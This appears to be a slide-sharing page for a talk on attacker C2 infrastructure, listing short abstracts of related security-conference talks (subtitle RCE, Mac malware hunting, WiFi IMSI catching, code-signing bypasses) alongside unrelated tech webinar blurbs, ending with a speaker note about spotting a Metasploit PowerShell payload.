The global security landscape is changing, now more than ever. With cloud computing gaining momentum and advanced persistent threats becoming a common occurrence, the industry is taking a more focused and serious approach when it comes to security, especially after some of last years’ heavily publicized incidents. Join this session for a discussion on what Microsoft is doing to protect against these new security threats with fresh approaches taken both at the server & client OS level, as well as in Azure.
2016, A New Era of OS and Cloud Security - Tudor DamianITCamp
This document summarizes a presentation about new security trends and technologies from Microsoft. The presentation covered:
1) Industry security trends like the evolution of attacks from script kiddies to organized crime and nation-states, and how modern attacks compromise credentials and use legitimate tools.
2) New Microsoft security technologies like Shielded VMs, Hypervisor Code Integrity, and Device Guard that provide hardware-based security on Windows devices.
3) Other technologies like Provable PC Health that attest the health of devices and Advanced Threat Analytics that uses machine learning to detect abnormal active directory usage indicating attacks.
Making Threat Management More ManageableIBM Security
With significant breaches of personal and corporate data being announced on a near-regular cadence, there is even more value in understanding both how the dynamic attack chain really works, and what tools your organization can use to disrupt it. From break-in to exfiltration, follow along step-by-step to understand how easy it is for attackers to infiltrate your network and steal sensitive data. Learn what technologies you can use to combat these threats and contain the impact of a breach, and determine what protection strategy you should encompass to make threat management more manageable.
View the full on-demand webcast:http://securityintelligence.com/events/making-threat-management-manageable/#.VMvYyPMo6Mp
CrowdCasts Monthly: Going Beyond the IndicatorCrowdStrike
Learn more about CrowdStrike Services. Request a free consultation on Proactive Response and Incident Response offerings: response.crowdstrike.com/services/
Amazon GuardDuty - Let's Attack My Account! - AWS Online Tech TalksAmazon Web Services
Learning Objectives:
- How to safely generate a number of Amazon GuardDuty findings
- How to analyze Amazon GuardDuty findings
- How to think about remediation of threats
- The document discusses nameserver redirection attacks and SQL injection attacks against domain name registry systems.
- It provides examples of how attackers can change domain name registrations through SQL injection or by directly modifying registry databases to redirect traffic to malicious sites.
- A live demonstration shows how SQL injection can be used to enumerate and modify a registry database, redirecting a domain to a rogue IP address and server.
- Mitigation strategies include securing web applications, validating input, using authentication for changes, and information sharing about attacks.
Protecting the Software-Defined Data Center from Data BreachCA Technologies
In this session, learn:
Security Requirements for our next generation software defined data centers
VMware NSX™, VMware’s network virtualization platform, and how it protects the software defined data center
CA Privileged Access Manager for VMware NSX™, and how it protects the management plane of VMware NSX™
For more information, please visit http://cainc.to/Nv2VOe
Similar to Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure (20)
This document provides an overview of WebAssembly (WASM) and analyzes its attack surface. It begins with a brief history of WASM and describes its Minimum Viable Product (MVP) 1.0 specification, which defines its instruction set and file format. It then discusses WASM's implementation in web browsers and interaction with JavaScript, highlighting its potential attack surface. Examples of past vulnerabilities leveraging WASM are also provided, such as CVE-2017-5116 which used a race condition to redirect execution to attacker-controlled code. The document concludes by discussing the future of WASM and taking questions.
This document discusses techniques used for hunting and analyzing malware on Mac systems. It describes common commands used by attackers for reconnaissance, backdoor installation, persistence, cleanup, and lateral movement. Specific indicators are also provided, such as backdoor file names and IP addresses. Hunting involves understanding the process tree and difficulties in detection given legitimate system tools are also used by attackers.
The document summarizes a presentation about exploiting a vulnerability in Apple's code signing process on macOS. The vulnerability allows ad-hoc signed malicious code to bypass Gatekeeper and execute on systems where only Apple-signed code is supposed to run. The presentation covered code signing basics, a demonstration of the vulnerability, technical details, how it impacts third-party software vendors, the disclosure process to Apple, and recommendations for properly validating signed code.
Cloud forensics putting the bits back togetherShakacon
The document discusses forensic investigations of AWS EC2 instances and EBS volumes. It details the process the author took to launch EC2 instances with different EBS volume types, write and delete files, snapshot the volumes, and use forensic software to recover deleted files from the snapshots. The results showed that standard, gp2 and io1 volume types had the highest recovery rates of deleted files from snapshots, while sc1 and st1 volume types recovered fewer files and in some cases produced anomalously large PDF files. Maintaining chain of custody of forensic evidence and using separate AWS accounts was recommended to safeguard recovered data.
Pwned in Translation - from Subtitles to RCEShakacon
What if I told you, that when you're watching a movie on your PC or streamer - someone might also be watching you. And he might be doing so - using subtitles.
Yes, subtitles, those innocent looking text lines at the bottom of your screen. Millions of people use them without a second thought – never wondering where they come from, where they're parsed or how they are rendered. You might be surprised to find that there are actually more than 25 subtitle formats out there, most of which support exotic features such as HTML tags, raw images or even freeform binary (What?). Moreover, there is no standard library designed to parse subtitles, which leaves this task to be independently implemented by the various media players. What can go wrong?
Well, basically - everything.
This presentation will show, for the first-ever time on stage, the disastrous potential of subtitles as an attack vector. We will explain and demo the numerous vulnerabilities we found involving subtitles. There will be unsanitized JavaScript running on native web applications; file systems being manipulated; heaps being corrupted; and full RCE on the most common streaming platforms including VLC, Kodi (XBMC) and PopcornTime. It really seems there is no limit to what can be done using those little helpful text files.
But perhaps the best thing about this attack vector, is that in some of these media players, subtitles are automatically downloaded, requiring no user interaction. These subtitles are commonly downloaded from shared online repositories (such as OpenSubtitles) where they are indexed and ranked. In order to make sure our crafted malicious subtitles would be the ones downloaded by the video player, we had to manipulate the website ranking algorithm. So, we did that as well - Look ma, no MITM.
Since we showed full control over the entire subtitles chain is possible, an attacker using this technique can also choose to narrow his target audience based on the subtitle language and specific movies or simply spray his exploits in all directions, which leaves millions of people exposed to this new infection method.
One of the most insidious actions of malware is abusing the video and audio capabilities of an infected host to record an unknowing user. Macs of course, are not immune; malware such as OSX/Eleanor, OSX/Crisis, and others, all attempt to spy on OS X users.
And as was recently shown by the author, more advanced malware could piggyback into legitimate webcam sessions in order to covertly record the local user. As there are no visible indications of this malicious activity (as the LED light is already on), the malware can record both audio and video without fear of detection.
After examining various ‘webcam-aware’ OS X malware samples and describing the technical details of the piggyback attack, the talk will dive into OverSight.
OverSight is a free tool that implements various novel protection mechanisms in order to alert Mac users of any code that attempts to access the mic or webcam (even via the stealthy piggyback attack). We’ll dive into the design and technical details of tool, describing various components for the first time.
Following this, we’ll look at an interesting case study, where OverSight discovered that a popular mac application was continuing to record, even when the user turned it off. Yikes! Finally, the talk will conclude by discussing future trends of both webcam/mic aware macOS malware and defensive detection methodologies. With such insights, we’ll strive to keep macOS users protected and secure!
Modern Reconnaissance Phase on APT - protection layerShakacon
The document discusses 5 case studies of modern reconnaissance techniques used by advanced persistent threat (APT) actors. Each case study examines a different infection vector involving documents with embedded objects that first perform reconnaissance on the target system before deciding whether to deploy a final payload. The case studies demonstrate evolving tactics to avoid exposing valuable code and thwart analysis.
A Decompiler for Blackhain-Based Smart Contracts BytecodeShakacon
The document discusses decompiling Ethereum smart contracts. It describes how smart contracts written in Solidity are compiled to Ethereum Virtual Machine (EVM) bytecode that is stored on the blockchain. The bytecode contains a dispatcher that uses the first 4 bytes of the call data, representing the function hash, to determine which function to execute. Function parameters and local variables are accessed using EVM instructions like CALLDATALOAD and stored in memory and on the stack.
Dock ir incident response in a containerized, immutable, continually deploy...Shakacon
This document discusses incident response strategies in a containerized and immutable infrastructure environment like Docker. It addresses challenges like lack of system and software inventory visibility due to rapid container changes, and lack of agent-based security due to single-purpose containers. It proposes solutions like establishing managed base container OSs, whitelisting allowed containers and files, and leveraging logs and sidecar containers to monitor for detections. Response challenges around long investigation timeframes due to short container lifetimes and lack of access are addressed with strategies like comprehensive logging, filesystem artifact preservation, and automating remote response capabilities.
Reviewing the Security of ASoC Drivers in Android KernelShakacon
The ALSA System on Chip (ASoC) provides a common architecture for chip vendors to develop drivers for their sound SoCs and codecs. It is also the core management of sound drivers in Android kernel. Compare with the well-known libstagefright library, the ASoC driver works in kernel space and talk to up level media libraries through HAL, thus it plays a much more important role, it is the real heart of the whole Android media service.
However, few vulnerabilities have been disclosed on this part on Android before our research (starting from the middle of 2016). There are multiple reasons: The ALSA project has almost twenty years history and most bugs may have been killed in the past few years in main linux kernel; Developers become more and more familiar with the project thus not easy to introduce bunch of new bugs; The standard of coding style, testing flow and code review processes guaranteed the quality, and this is often what the open source projects benefits.
But what if this old project meets with the much younger Android OS? The situation is really out of my expectation. With a total review of the ASoC implementation and combining effective fuzzing tools, I was able to disclose dozens of bugs in Android ASoC drivers. These bugs includes the type of normal OOBs, the stack overflows, the heap overflows, race conditions and the use-after-free/double-frees. And what comes out more interesting is that, these bugs were introduced from several different channels: chip vendors, device manufacturers, and the ALSA project maintainers.
This proves me the fact that the ASoC driver in Android kernel is a completely vulnerable but overlooked attack surface.
Silent Protest: A Wearable Protest NetworkShakacon
Independent observers are noting a decrease in Freedom of speech worldwide. In its 2016 report, Reporter without Borders unveils a "climate of fear and tension combined with increasing control over newsrooms by governments and private-sector interests.", while Amnesty International's report on the State of the World Human Rights states that “2016 was the year when the cynical use of ‘us vs them’ narratives of blame, hate and fear took on a global prominence to a level not seen since the 1930s. Too many politicians are answering legitimate economic and security fears with a poisonous and divisive manipulation of identity politics in an attempt to win votes”.
At the same time, the United Nations Statistics Division insist on the unprecedented literacy rate achieved by Mankind globally. Human beings have more and more things to say.
With this project, we present ProtestWear: a wearable DIY protest network build of inexpensive network gear and open source software. Its goal is to facilitate Freedom of Speech, enable Art sharing in countries where this Human Right is being challenged by authorities, and offer a customizable portable Anonymous Protest Network platform reliable and affordable enough to be built in third world countries and developed countries alike.
We introduce a new type of IMSI catcher which operates over WiFi. Whilst existing Stingray type IMSI catchers exploit 24G radio protocols to track movements of mobile subscribers, in this talk, we introduce a two new approaches to track mobile devices which exploit authentication protocols that operate over WiFi. These protocols are now widely implemented in most modern mobile OSes, allowing for the creation of a low cost (<25$) IMSI catcher.
We demonstrate how users may be tracked on range of smartphones and tablets including those running iOS, Android and other mobile OSs. This tracking can be performed silently and automatically without any interaction from the tracked user. We have developed a proof of concept system that demonstrates our IMSI catcher employing passive and active techniques.
Finally, we present guidelines for vendors and cellular network operators to mitigate the user privacy issues that arise.
The document discusses various malware techniques, including:
1) Devolving malware discusses getting unauthorized access to systems through social engineering and exploiting software vulnerabilities to gain shell access or sensitive files.
2) Password protected documents and embedded macros aim to trick users into enabling malicious macros that download and execute additional payloads like VBS scripts.
3) Several malware samples are described that use techniques like delayed execution, encoded payloads, and displaying decoy documents to evade detection in sandboxes and steal sensitive information from victims.
4) The document advocates copying code from other malware projects instead of writing original malware due to the time and effort required. User targeting, anti-sandbox tricks, and packers are also
Programmers naturally assume that different programs require different code. Minesweeper is not the same as AES, Windows is not the same as Linux, and Notepad is not the same as malware. But what if this were not the case? We'll walk through how we can convert all programs into the exact same code - allowing the CPU to execute the same sequence of instructions, to run any possible application. By fundamentally changing our ideas about what it means to "compute", we'll outline the unsettling implications for malware detection, and open some fascinating new doors in exploitation.
This presentation will sum up how to do tunnelling with different protocols and will have different perspectives detailed. For example, companies are fighting hard to block exfiltration from their network: they use http(s) proxies, DLP, IPS technologies to protect their data, but are they protected against tunnelling? There are so many interesting questions to answer for users, abusers, companies and malware researchers. Mitigation and bypass techniques will be shown you during this presentation, which can be used to filter any tunnelling on your network or to bypass misconfigured filters.
Windows Systems & Code Signing Protection by Paul RascagneresShakacon
This presentation explains the code signing mechanism (authenticode) developed by Microsoft on Windows systems. The presentation will first explain the kernel implication and the impact on driver development. This protection firstly annoyed rootkit developers but they found several ways to bypass it. Well-known rootkits such as Derusbi, Uroburos or GrayFish use tricks to bypass driver signature. These techniques will be described during the presentation. Finally, the user-land will be discussed with the new library injection protection based on code signing implemented in Windows 10 TH2 and especially for the Edge process.
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...Shakacon
Communication protocols are core to computing devices. They have evolved from the traditional Serial and LAN ports to complex (and lightweight) protocols of today, such as Bluetooth Low Energy (BLE), ANT+, ZigBee, etc.
Bluetooth Low Energy (BLE) is a popular protocol of choice for low energy, low performance computing systems. While versions of the BLE specification prior to 4.2 allowed simple key mechanisms to encrypt the communication between connected nodes, the more recent specification of BLE (4.2) provides better channel encryption via the Secure Simple Pairing (SSP) mode to protect data against snooping and man-in-the-middle style attacks. These protocols are used extensively by wearables such as smart watches and activity trackers.
Most wearables work in conjunction with a companion mobile application running on a platform that supports BLE with the aforementioned security mechanisms. We looked at Android and iOS for our study. We observe that there are fundamental assumptions (leading security limitations) in the adoption of the BLE security specifications on these two platforms. Relying on the standard BLE APIs for Android and iOS may be insufficient and may even project a false sense of security. It is critical to understand the degree of security that the BLE specifications can offer, and clearly separate that from the developers’ responsibility to design application level security in order to assure confidentiality and integrity of data being transmitted between a wearable device and its companion application.
The Search for the Perfect Door - Deviant OllamShakacon
You have spent lots of money on a high-grade, pick-resistant, ANSI-rated lock for your door. Your vendor has assured you how it will resist attack and how difficult it would be for someone to copy your key. Maybe they’re right. But… the bulk of attacks that both penetration testers and also criminals attempt against doors have little or nothing to do with the lock itself! This talk will be a hard-hitting exploration (full of photo and video examples) of the ways in which your door — the most fundamental part of your physical security — can possibly be thwarted by someone attempting illicit entry. The scary problems will be immediately followed by simple solutions that are instantly implementable and usually very within-budget. You, too, can have a near-perfect door… if you’re willing to learn and understand the problems that all doors tend to have.
At WWDC 2014, Apple introduced Swift, their revolutionary new programming language for the future. Swift promises unapologetic optimization, outstanding speed, and best-in-class language features. Swift is sleek, stunning, and already the most loved language on StackOverflow. Up until now, no reverse engineer has dissected the language or the artifacts it produces and presented their findings. However, since an hour long presentation discussing Swift class structure and string layouts would be painfully boring, this talk actually presents a systematic approach to binary reverse engineering new foreign ABIs using Swift as a case study. I’ll present approaches for identifying control structures and flow, recovering class layouts, mapping machine code patterns to higher level language constructs, and more!
This presentation will leave you with the knowledge and confidence needed to take on any ABIs – maybe even Haskell.
Making a Scalable Automated Hacking System by Artem DinaburgShakacon
In this presentation, I’ll tell the story of our Cyber Grand Challenge adventure, explain how to automatically find and patch bugs in binary code, and discuss what’s next for our bug finding system.
The story will describe how our small team of internationally distributed engineers made an automated bug finding system that placed 2nd in vulnerability discovery. I will cover both the fun parts and the necessary-but-boring-parts of automated bug finding. Fun parts include combining existing fuzzing and symbolic execution tools into one coherent system, and making fuzzing fast by identifying and eliminating performance bottlenecks. The necessary-but-boring-parts include automated testing, deployment, and configuration management, otherwise known as devops.
Second, I’ll talk about how to patch bugs by translating binaries to LLVM bitcode, patching the bitcode, and re-emitting working patched binaries. I will cover different patching strategies and the requirements for each approach. I will also discuss instrumentation techniques, transformation operations, and analysis passes that are enabled by LLVM translation.
Finally, I will talk about how researchers should fundamentally change the way bug finding tools are developed. Currently each tools is its own discrete island. However, there are quantifiable benefits to be gained by applying the Unix philosophy of discrete, communicating tools to the problem of bug finding.
Best 20 SEO Techniques To Improve Website Visibility In SERPPixlogix Infotech
Boost your website's visibility with proven SEO techniques! Our latest blog dives into essential strategies to enhance your online presence, increase traffic, and rank higher on search engines. From keyword optimization to quality content creation, learn how to make your site stand out in the crowded digital landscape. Discover actionable tips and expert insights to elevate your SEO game.
Project Management Semester Long Project - Acuityjpupo2018
Acuity is an innovative learning app designed to transform the way you engage with knowledge. Powered by AI technology, Acuity takes complex topics and distills them into concise, interactive summaries that are easy to read & understand. Whether you're exploring the depths of quantum mechanics or seeking insight into historical events, Acuity provides the key information you need without the burden of lengthy texts.
Ivanti’s Patch Tuesday breakdown goes beyond patching your applications and brings you the intelligence and guidance needed to prioritize where to focus your attention first. Catch early analysis on our Ivanti blog, then join industry expert Chris Goettl for the Patch Tuesday Webinar Event. There we’ll do a deep dive into each of the bulletins and give guidance on the risks associated with the newly-identified vulnerabilities.
Monitoring and Managing Anomaly Detection on OpenShift.pdfTosin Akinosho
Monitoring and Managing Anomaly Detection on OpenShift
Overview
Dive into the world of anomaly detection on edge devices with our comprehensive hands-on tutorial. This SlideShare presentation will guide you through the entire process, from data collection and model training to edge deployment and real-time monitoring. Perfect for those looking to implement robust anomaly detection systems on resource-constrained IoT/edge devices.
Key Topics Covered
1. Introduction to Anomaly Detection
- Understand the fundamentals of anomaly detection and its importance in identifying unusual behavior or failures in systems.
2. Understanding Edge (IoT)
- Learn about edge computing and IoT, and how they enable real-time data processing and decision-making at the source.
3. What is ArgoCD?
- Discover ArgoCD, a declarative, GitOps continuous delivery tool for Kubernetes, and its role in deploying applications on edge devices.
4. Deployment Using ArgoCD for Edge Devices
- Step-by-step guide on deploying anomaly detection models on edge devices using ArgoCD.
5. Introduction to Apache Kafka and S3
- Explore Apache Kafka for real-time data streaming and Amazon S3 for scalable storage solutions.
6. Viewing Kafka Messages in the Data Lake
- Learn how to view and analyze Kafka messages stored in a data lake for better insights.
7. What is Prometheus?
- Get to know Prometheus, an open-source monitoring and alerting toolkit, and its application in monitoring edge devices.
8. Monitoring Application Metrics with Prometheus
- Detailed instructions on setting up Prometheus to monitor the performance and health of your anomaly detection system.
9. What is Camel K?
- Introduction to Camel K, a lightweight integration framework built on Apache Camel, designed for Kubernetes.
10. Configuring Camel K Integrations for Data Pipelines
- Learn how to configure Camel K for seamless data pipeline integrations in your anomaly detection workflow.
11. What is a Jupyter Notebook?
- Overview of Jupyter Notebooks, an open-source web application for creating and sharing documents with live code, equations, visualizations, and narrative text.
12. Jupyter Notebooks with Code Examples
- Hands-on examples and code snippets in Jupyter Notebooks to help you implement and test anomaly detection models.
Have you ever been confused by the myriad of choices offered by AWS for hosting a website or an API?
Lambda, Elastic Beanstalk, Lightsail, Amplify, S3 (and more!) can each host websites + APIs. But which one should we choose?
Which one is cheapest? Which one is fastest? Which one will scale to meet our needs?
Join me in this session as we dive into each AWS hosting service to determine which one is best for your scenario and explain why!
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-und-domino-lizenzkostenreduzierung-in-der-welt-von-dlau/
DLAU und die Lizenzen nach dem CCB- und CCX-Modell sind für viele in der HCL-Community seit letztem Jahr ein heißes Thema. Als Notes- oder Domino-Kunde haben Sie vielleicht mit unerwartet hohen Benutzerzahlen und Lizenzgebühren zu kämpfen. Sie fragen sich vielleicht, wie diese neue Art der Lizenzierung funktioniert und welchen Nutzen sie Ihnen bringt. Vor allem wollen Sie sicherlich Ihr Budget einhalten und Kosten sparen, wo immer möglich. Das verstehen wir und wir möchten Ihnen dabei helfen!
Wir erklären Ihnen, wie Sie häufige Konfigurationsprobleme lösen können, die dazu führen können, dass mehr Benutzer gezählt werden als nötig, und wie Sie überflüssige oder ungenutzte Konten identifizieren und entfernen können, um Geld zu sparen. Es gibt auch einige Ansätze, die zu unnötigen Ausgaben führen können, z. B. wenn ein Personendokument anstelle eines Mail-Ins für geteilte Mailboxen verwendet wird. Wir zeigen Ihnen solche Fälle und deren Lösungen. Und natürlich erklären wir Ihnen das neue Lizenzmodell.
Nehmen Sie an diesem Webinar teil, bei dem HCL-Ambassador Marc Thomas und Gastredner Franz Walder Ihnen diese neue Welt näherbringen. Es vermittelt Ihnen die Tools und das Know-how, um den Überblick zu bewahren. Sie werden in der Lage sein, Ihre Kosten durch eine optimierte Domino-Konfiguration zu reduzieren und auch in Zukunft gering zu halten.
Diese Themen werden behandelt
- Reduzierung der Lizenzkosten durch Auffinden und Beheben von Fehlkonfigurationen und überflüssigen Konten
- Wie funktionieren CCB- und CCX-Lizenzen wirklich?
- Verstehen des DLAU-Tools und wie man es am besten nutzt
- Tipps für häufige Problembereiche, wie z. B. Team-Postfächer, Funktions-/Testbenutzer usw.
- Praxisbeispiele und Best Practices zum sofortigen Umsetzen
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slackshyamraj55
Discover the seamless integration of RPA (Robotic Process Automation), COMPOSER, and APM with AWS IDP enhanced with Slack notifications. Explore how these technologies converge to streamline workflows, optimize performance, and ensure secure access, all while leveraging the power of AWS IDP and real-time communication via Slack notifications.
HCL Notes and Domino License Cost Reduction in the World of DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don’t worry, we can help with all of this!
We’ll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We’ll provide examples and solutions for those as well. And naturally we’ll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
Programming Foundation Models with DSPy - Meetup SlidesZilliz
Prompting language models is hard, while programming language models is easy. In this talk, I will discuss the state-of-the-art framework DSPy for programming foundation models with its powerful optimizers and runtime constraint system.
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc
How does your privacy program stack up against your peers? What challenges are privacy teams tackling and prioritizing in 2024?
In the fifth annual Global Privacy Benchmarks Survey, we asked over 1,800 global privacy professionals and business executives to share their perspectives on the current state of privacy inside and outside of their organizations. This year’s report focused on emerging areas of importance for privacy and compliance professionals, including considerations and implications of Artificial Intelligence (AI) technologies, building brand trust, and different approaches for achieving higher privacy competence scores.
See how organizational priorities and strategic approaches to data security and privacy are evolving around the globe.
This webinar will review:
- The top 10 privacy insights from the fifth annual Global Privacy Benchmarks Survey
- The top challenges for privacy leaders, practitioners, and organizations in 2024
- Key themes to consider in developing and maintaining your privacy program
Fueling AI with Great Data with Airbyte WebinarZilliz
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxSitimaJohn
Ocean Lotus cyber threat actors represent a sophisticated, persistent, and politically motivated group that poses a significant risk to organizations and individuals in the Southeast Asian region. Their continuous evolution and adaptability underscore the need for robust cybersecurity measures and international cooperation to identify and mitigate the threats posed by such advanced persistent threat groups.
Skybuffer SAM4U tool for SAP license adoptionTatiana Kojar
Manage and optimize your license adoption and consumption with SAM4U, an SAP free customer software asset management tool.
SAM4U, an SAP complimentary software asset management tool for customers, delivers a detailed and well-structured overview of license inventory and usage with a user-friendly interface. We offer a hosted, cost-effective, and performance-optimized SAM4U setup in the Skybuffer Cloud environment. You retain ownership of the system and data, while we manage the ABAP 7.58 infrastructure, ensuring fixed Total Cost of Ownership (TCO) and exceptional services through the SAP Fiori interface.
Driving Business Innovation: Latest Generative AI Advancements & Success StorySafe Software
Are you ready to revolutionize how you handle data? Join us for a webinar where we’ll bring you up to speed with the latest advancements in Generative AI technology and discover how leveraging FME with tools from giants like Google Gemini, Amazon, and Microsoft OpenAI can supercharge your workflow efficiency.
During the hour, we’ll take you through:
Guest Speaker Segment with Hannah Barrington: Dive into the world of dynamic real estate marketing with Hannah, the Marketing Manager at Workspace Group. Hear firsthand how their team generates engaging descriptions for thousands of office units by integrating diverse data sources—from PDF floorplans to web pages—using FME transformers, like OpenAIVisionConnector and AnthropicVisionConnector. This use case will show you how GenAI can streamline content creation for marketing across the board.
Ollama Use Case: Learn how Scenario Specialist Dmitri Bagh has utilized Ollama within FME to input data, create custom models, and enhance security protocols. This segment will include demos to illustrate the full capabilities of FME in AI-driven processes.
Custom AI Models: Discover how to leverage FME to build personalized AI models using your data. Whether it’s populating a model with local data for added security or integrating public AI tools, find out how FME facilitates a versatile and secure approach to AI.
We’ll wrap up with a live Q&A session where you can engage with our experts on your specific use cases, and learn more about optimizing your data workflows with AI.
This webinar is ideal for professionals seeking to harness the power of AI within their data management systems while ensuring high levels of customization and security. Whether you're a novice or an expert, gain actionable insights and strategies to elevate your data processes. Join us to see how FME and AI can revolutionize how you work with data!
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceIndexBug
Imagine a world where machines not only perform tasks but also learn, adapt, and make decisions. This is the promise of Artificial Intelligence (AI), a technology that's not just enhancing our lives but revolutionizing entire industries.
Easy slide to breeze past on, client contacts us with alert, we immediately recognize as a classic Metasploit PowerShell payload, pretty likely this is bad news
Easy slide to breeze past on, client contacts us with alert, we immediately recognize as a classic Metasploit PowerShell payload, pretty likely this is bad news